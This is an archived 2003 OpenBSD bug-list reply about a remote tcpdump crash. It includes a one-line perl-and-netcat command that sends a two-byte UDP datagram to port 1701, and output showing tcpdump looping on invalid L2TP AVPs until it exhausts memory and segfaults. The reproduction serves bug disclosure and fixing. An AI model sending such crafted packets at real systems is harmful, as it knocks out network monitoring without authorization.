[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: user/3610: repetable tcpdump remote crash
- To: bugs_(_at_)_cvs_(_dot_)_openbsd_(_dot_)_org
- Subject: Re: user/3610: repetable tcpdump remote crash
- From: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
- Date: Sat, 20 Dec 2003 13:25:01 -0700 (MST)
- Cc:
- Reply-to: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
The following reply was made to PR user/3610; it has been noted by GNATS.
From: Przemyslaw Frasunek <venglin_(_at_)_freebsd_(_dot_)_lublin_(_dot_)_pl>
To: Otto Moerbeek <otto_(_at_)_drijf_(_dot_)_net>
Cc: gnats_(_at_)_openbsd_(_dot_)_org
Subject: Re: user/3610: repetable tcpdump remote crash
Date: Sat, 20 Dec 2003 21:11:00 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Otto Moerbeek wrote:
>> tcpdump -i lo0 -n udp and dst port 1701 &
>> perl -e 'print "\xff\x02"' | nc -u localhost 1701
> I am not able to reproduce this on 3.3-stable and on 3.4-current. My
> tcpdump sessions prints:
> 20:41:16.157485 127.0.0.1.16993 > 127.0.0.1.1701:
l2tp:[TLSOP](0/0)Ns=0,Nr=0 |...
Ok, sorry for the misinformation, it will not work on a loopback interface,
but it's perfectly repetable when receiving/routing such datagram on
ethernet interfaces:
<root_(_at_)_ext-fw:/var/log:273># uname -smr ; tcpdump -V 2>&1 | head -n 2
OpenBSD 3.3 i386
tcpdump version 3.4.0
libpcap version 0.5
<root_(_at_)_ext-fw:/var/log:274># tcpdump -i xl1
tcpdump: listening on xl1
On the another box:
riget:root:~# perl -e 'print "\xff\x02"' | nc -u x.x.x.x 1701
and tcpdump goes mad:
[...]
invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid
AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256
invalid
AVP 256 invalid AVP 256 invalid AVP 256 invalid AVP 256
[...]
consuming all memory. When ulimits are reached, it segfaults.
- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin_(_at_)_jabber_(_dot_)_atman_(_dot_)_pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQE/5KzUkxEnBiV4/K0RArtfAKCuKWYAyW+AJmnjndcpXuZxJcWi/ACdGMrA
ZvYTkrHqwX2Xc05cInKkXCk=
=nP5S
-----END PGP SIGNATURE-----
Visit your host, monkey.org